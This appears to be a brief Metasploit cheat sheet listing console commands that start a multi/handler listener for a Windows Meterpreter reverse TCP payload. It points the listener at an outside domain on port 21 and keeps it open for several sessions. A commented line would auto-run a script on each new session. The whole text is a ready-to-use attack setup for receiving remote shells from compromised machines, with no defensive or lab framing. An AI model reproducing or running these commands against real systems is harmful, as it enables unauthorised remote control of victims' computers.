
Metasploit Cheatsheet
Cheat sheet of Metasploit… Commands are as follows..
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script...